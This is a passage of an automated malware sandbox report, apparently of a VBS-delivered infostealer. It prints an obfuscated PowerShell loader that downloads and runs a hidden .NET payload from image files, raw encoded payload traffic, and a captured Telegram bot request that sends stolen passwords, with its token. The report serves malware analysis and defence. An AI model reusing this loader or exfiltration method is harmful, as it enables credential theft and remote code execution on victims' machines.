                                                                                                                              Data Ascii: BQaAcGAvBAbXEAAdBgRAcDAwAAMAUHAcBQLAADAyAAMAADA1BAXA4FAbFCAAICApAwPAoCAuAAKAICA6AgIAkCAlBQbAEGAuBgcAUGAzBQVAQGAlBAdAAHA5BgcAMGAuBQZAwHAkBgcA8GA3BwcAMHAhBAUAQGAlBAdAAHA5BgcAMGAuBQZAwHAlBQbAEGAuBAdAMHAvBAaAgCAiAAXzFAApAwKA0FAtAAXA4CAcBwLAwFA5AQLAADA6BQLAEEA
                                                                                                                              2024-04-24 04:48:26 UTC8000INData Raw: 30 44 41 74 41 51 50 41 30 43 41 39 41 51 4c 41 30 44 41 74 41 51 50 41 30 43 41 39 41 51 4c 41 30 44 41 74 41 51 50 41 30 43 41 39 41 51 4c 41 30 44 41 74 41 51 50 41 30 43 41 39 41 51 4c 41 30 44 41 74 41 51 50 41 30 43 41 39 41 51 4c 41 30 44 41 74 41 51 50 41 30 43 41 39 41 51 4c 41 30 44 41 74 41 51 50 41 30 43 41 39 41 51 4c 41 30 7a 6e 41 43 41 41 36 42 67 65 41 6f 33 42 41 41 67 54 41 59 45 41 44 42 67 4c 41 51 48 41 75 42 51 64 41 38 47 41 6a 42 77 59 41 45 45 41 63 6c 42 41 41 45 43 41 30 42 51 59 41 49 45 41 67 41 51 5a 41 67 47 41 55 42 41 58 54 41 41 41 68 41 41 64 41 45 47 41 43 42 41 49 41 55 47 41 6f 42 41 56 52 41 41 41 2b 41 41 5a 41 49 48 41 76 42 77 64 41 4d 48 41 7a 42 51 59 41 41 48 41 66 42 67 63 41 55 47 41 7a 42 51 64 41 38 46 41
                                                                                                                              Data Ascii: 0DAtAQPA0CA9AQLA0DAtAQPA0CA9AQLA0DAtAQPA0CA9AQLA0DAtAQPA0CA9AQLA0DAtAQPA0CA9AQLA0DAtAQPA0CA9AQLA0DAtAQPA0CA9AQLA0znACAA6BgeAo3BAAgTAYEADBgLAQHAuBQdA8GAjBwYAEEAclBAAECA0BQYAIEAgAQZAgGAUBAXTAAAhAAdAEGACBAIAUGAoBAVRAAA+AAZAIHAvBwdAMHAzBQYAAHAfBgcAUGAzBQdA8FA
                                                                                                                              2024-04-24 04:48:26 UTC8000INData Raw: 34 47 41 6c 42 41 64 41 67 48 41 46 42 41 49 41 4d 48 41 33 42 77 62 41 51 47 41 75 42 51 61 41 63 31 4e 42 41 41 4f 41 51 44 41 31 41 77 4e 41 63 44 41 42 42 51 4f 41 55 44 41 33 41 67 4e 41 59 45 41 7a 41 51 4c 41 49 45 41 47 42 41 4f 41 45 45 41 74 41 67 4d 41 45 45 41 42 42 41 4e 41 30 43 41 35 41 67 4e 41 59 44 41 79 41 51 4c 41 4d 44 41 47 42 67 52 41 59 44 41 34 41 41 4f 41 4d 45 41 7a 6b 45 41 41 77 47 41 68 42 51 61 41 51 48 41 75 42 51 5a 41 51 47 41 6c 42 67 63 41 4d 45 41 67 41 41 5a 41 49 48 41 76 42 77 64 41 4d 48 41 7a 42 51 59 41 41 46 41 67 41 67 62 41 6b 47 41 68 42 51 62 41 38 47 41 45 42 41 49 41 4d 48 41 33 42 77 62 41 51 47 41 75 42 51 61 41 63 56 52 42 41 67 51 41 55 44 41 33 41 67 4d 41 59 44 41 43 42 51 4d 41 41 44 41 35 41 41 52
                                                                                                                              Data Ascii: 4GAlBAdAgHAFBAIAMHA3BwbAQGAuBQaAc1NBAAOAQDA1AwNAcDABBQOAUDA3AgNAYEAzAQLAIEAGBAOAEEAtAgMAEEABBANA0CA5AgNAYDAyAQLAMDAGBgRAYDA4AAOAMEAzkEAAwGAhBQaAQHAuBQZAQGAlBgcAMEAgAAZAIHAvBwdAMHAzBQYAAFAgAgbAkGAhBQbA8GAEBAIAMHA3BwbAQGAuBQaAcVRBAgQAUDA3AgMAYDACBQMAADA5AAR
                                                                                                                              2024-04-24 04:48:26 UTC8000INData Raw: 4d 6e 62 76 6c 47 64 77 39 45 65 6c 64 57 5a 53 42 77 63 75 39 57 61 30 42 33 54 30 6c 47 62 77 4e 31 5a 75 6c 6d 63 30 4e 46 41 7a 35 32 62 70 52 33 59 6c 4a 58 61 6b 56 6d 55 6a 6c 47 64 68 31 32 62 30 56 58 51 74 56 58 62 70 68 58 59 4e 39 46 64 6c 4e 48 41 7a 35 32 62 70 52 33 59 6c 78 47 62 76 4e 6b 4c 74 56 47 64 7a 6c 33 55 41 4d 6e 62 76 6c 47 64 68 4a 58 5a 30 6c 47 41 7a 35 32 62 70 4e 33 63 6c 4a 48 63 34 56 6b 63 68 78 57 64 6e 56 6d 55 75 51 48 65 6c 52 6c 4c 74 56 47 64 7a 6c 33 55 41 4d 6e 62 76 6c 32 63 75 56 47 64 34 56 6b 4c 69 56 32 56 75 30 57 5a 30 4e 58 65 54 42 77 63 75 6c 57 59 30 35 32 62 44 42 77 63 74 4a 33 62 47 35 79 63 33 39 47 5a 75 6c 32 56 75 30 57 5a 30 4e 58 65 54 42 77 63 74 56 47 64 4a 56 47 64 68 4a 58 5a 74 56 6e 62
                                                                                                                              Data Ascii: MnbvlGdw9EeldWZSBwcu9Wa0B3T0lGbwN1Zulmc0NFAz52bpR3YlJXakVmUjlGdh12b0VXQtVXbphXYN9FdlNHAz52bpR3YlxGbvNkLtVGdzl3UAMnbvlGdhJXZ0lGAz52bpN3clJHc4VkchxWdnVmUuQHelRlLtVGdzl3UAMnbvl2cuVGd4VkLiV2Vu0WZ0NXeTBwculWY052bDBwctJ3bG5yc39GZul2Vu0WZ0NXeTBwctVGdJVGdhJXZtVnb
                                                                                                                              2024-04-24 04:48:26 UTC8000INData Raw: 74 45 64 70 42 41 61 46 6c 56 53 31 59 6a 57 6b 4a 46 61 41 67 47 52 6f 35 47 41 6f 56 54 56 35 42 77 5a 36 31 6b 63 5a 56 57 53 41 63 32 63 4e 39 46 64 6c 64 47 41 6e 35 57 61 33 46 6d 63 45 35 53 62 6c 52 33 63 35 4e 46 41 6e 35 57 61 79 52 33 63 69 56 33 55 41 63 6d 62 70 4a 48 64 54 52 58 61 43 42 77 5a 75 6c 6d 63 30 4e 46 64 6c 52 33 59 50 42 77 5a 75 6c 6d 63 30 4e 46 64 6c 64 45 41 6e 35 57 61 79 52 33 55 76 52 46 41 6e 35 57 61 79 52 33 55 6c 78 57 61 6d 39 6d 63 51 56 47 64 68 5a 58 61 79 42 46 64 6c 64 45 41 6e 35 57 61 79 52 33 55 6b 56 6d 62 79 56 48 64 6c 4a 46 63 73 42 77 5a 75 6c 6d 63 30 4e 56 59 30 46 47 52 6c 42 58 59 6a 4e 58 5a 75 56 46 41 6e 35 57 61 79 52 33 55 68 52 58 59 45 56 47 63 68 4e 32 63 46 42 77 5a 75 6c 6d 63 30 4e 46 4e
                                                                                                                              Data Ascii: tEdpBAaFlVS1YjWkJFaAgGRo5GAoVTV5BwZ61kcZVWSAc2cN9FdldGAn5Wa3FmcE5SblR3c5NFAn5WayR3ciV3UAcmbpJHdTRXaCBwZulmc0NFdlR3YPBwZulmc0NFdldEAn5WayR3UvRFAn5WayR3UlxWam9mcQVGdhZXayBFdldEAn5WayR3UkVmbyVHdlJFcsBwZulmc0NVY0FGRlBXYjNXZuVFAn5WayR3UhRXYEVGchN2cFBwZulmc0NFN
                                                                                                                              2024-04-24 04:48:26 UTC8000INData Raw: 51 48 41 68 5a 7a 53 4f 42 77 58 66 56 57 64 73 46 6d 64 41 6f 56 65 51 56 6c 4d 35 59 56 4e 7a 42 67 57 35 64 55 64 41 6f 6c 64 4e 4a 30 55 32 45 57 65 69 4a 31 54 41 6f 46 64 4a 6c 57 53 76 4a 6a 4d 53 42 67 57 7a 6c 48 4f 4d 5a 48 41 61 4e 58 52 41 6f 31 62 6d 52 6b 61 5a 42 58 4e 49 56 48 41 61 35 32 4e 69 52 31 62 48 4a 7a 51 78 41 67 57 71 46 33 52 32 59 33 55 34 6b 44 41 61 70 6d 61 35 45 58 65 34 4a 48 41 61 70 57 4f 45 68 31 54 79 4a 48 52 41 6f 31 5a 71 64 46 4d 75 4a 58 4e 31 49 6e 54 41 6f 31 56 50 46 6c 51 32 4e 31 4d 79 41 67 57 52 4e 58 54 6b 42 44 41 61 56 6b 63 35 4a 6b 57 69 4a 6e 54 71 56 46 41 61 52 55 52 41 6f 6c 51 6f 52 46 41 61 6c 54 4f 32 68 54 4f 34 68 6b 56 78 41 46 41 5a 31 47 56 46 74 6b 55 41 6b 56 62 4c 42 6a 63 33 6c 6a 64
                                                                                                                              Data Ascii: QHAhZzSOBwXfVWdsFmdAoVeQVlM5YVNzBgW5dUdAoldNJ0U2EWeiJ1TAoFdJlWSvJjMSBgWzlHOMZHAaNXRAo1bmRkaZBXNIVHAa52NiR1bHJzQxAgWqF3R2Y3U4kDAapma5EXe4JHAapWOEh1TyJHRAo1ZqdFMuJXN1InTAo1VPFlQ2N1MyAgWRNXTkBDAaVkc5JkWiJnTqVFAaRURAolQoRFAalTO2hTO4hkVxAFAZ1GVFtkUAkVbLBjc3ljd
                                                                                                                              2024-04-24 04:48:26 UTC8000INData Raw: 67 47 42 33 47 41 41 41 67 41 4a 69 54 51 74 42 41 41 41 49 77 55 36 45 4d 62 41 41 41 41 43 68 59 45 42 78 47 67 45 41 67 51 49 69 51 77 72 42 59 45 41 49 45 79 5a 45 30 61 41 41 42 41 43 68 6b 46 42 72 47 41 51 41 67 77 4b 67 53 51 71 42 59 45 41 49 30 68 39 45 63 61 41 41 41 41 43 67 49 48 42 6c 47 41 51 41 67 51 52 70 51 77 6f 42 41 45 41 49 55 55 48 45 45 61 41 41 42 41 43 67 59 47 42 66 47 41 51 41 73 67 4e 56 53 51 6e 42 41 41 41 4c 63 6b 49 45 73 5a 41 41 42 51 43 65 4d 2b 41 72 48 41 41 41 6f 51 53 64 4f 51 36 42 41 41 41 4b 6b 30 71 44 63 65 41 41 41 67 43 4f 6c 38 41 6c 48 41 41 41 6f 67 54 35 4f 77 34 42 41 41 41 4b 41 46 58 44 45 65 41 41 41 67 43 51 70 30 41 66 48 41 41 41 6f 51 50 42 4d 51 33 42 41 41 41 4b 30 6a 48 44 73 64 41 41 41 51 43
                                                                                                                              Data Ascii: gGB3GAAAgAJiTQtBAAAIwU6EMbAAAAChYEBxGgEAgQIiQwrBYEAIEyZE0aAABAChkFBrGAQAgwKgSQqBYEAI0h9EcaAAAACgIHBlGAQAgQRpQwoBAEAIUUHEEaAABACgYGBfGAQAsgNVSQnBAAALckIEsZAABQCeM+ArHAAAoQSdOQ6BAAAKk0qDceAAAgCOl8AlHAAAogT5Ow4BAAAKAFXDEeAAAgCQp0AfHAAAoQPBMQ3BAAAK0jHDsdAAAQC


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.549710149.154.167.2204435684C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-04-24 04:48:29 UTC260OUTPOST /bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocument HTTP/1.1
                                                                                                                              Content-Type: multipart/form-data; boundary=---------------------------8dc642a8c196134
                                                                                                                              Host: api.telegram.org
                                                                                                                              Content-Length: 917
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-04-24 04:48:30 UTC917OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 34 32 61 38 63 31 39 36 31 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 35 38 30 38 37 30 32 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 36 34 32 61 38 63 31 39 36 31 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 32 34 2f 32 30 32 34 20 30 36 3a 34 38 3a 32 38 0a 55 73 65 72 20
                                                                                                                              Data Ascii: -----------------------------8dc642a8c196134Content-Disposition: form-data; name="chat_id"595808702-----------------------------8dc642a8c196134Content-Disposition: form-data; name="caption"New PW Recovered!Time: 04/24/2024 06:48:28User
                                                                                                                              2024-04-24 04:48:30 UTC25INHTTP/1.1 100 Continue
                                                                                                                              2024-04-24 04:48:30 UTC402INHTTP/1.1 400 Bad Request
                                                                                                                              Server: nginx/1.18.0
                                                                                                                              Date: Wed, 24 Apr 2024 04:48:30 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 56
                                                                                                                              Connection: close
                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                              {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:0
                                                                                                                              Start time:06:48:10
                                                                                                                              Start date:24/04/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reconfirm Details.vbs"
                                                                                                                              Imagebase:0x7ff6df8a0000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:2
                                                                                                                              Start time:06:48:12
                                                                                                                              Start date:24/04/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTrebgBvDgTreGgDgTreLwBiDgTreGEDgTreLwBtDgTreG8DgTreYwDgTreuDgTreG8DgTreYwBzDgTreG4DgTrebwBzDgTreGgDgTrebQDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBzDgTreGEDgTredDgTreBpDgTreHYDgTreYQBkDgTreG8DgTreJwDgTresDgTreCcDgTreTQBTDgTreEIDgTredQBpDgTreGwDgTreZDgTreDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:3
                                                                                                                              Start time:06:48:12
                                                                                                                              Start date:24/04/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
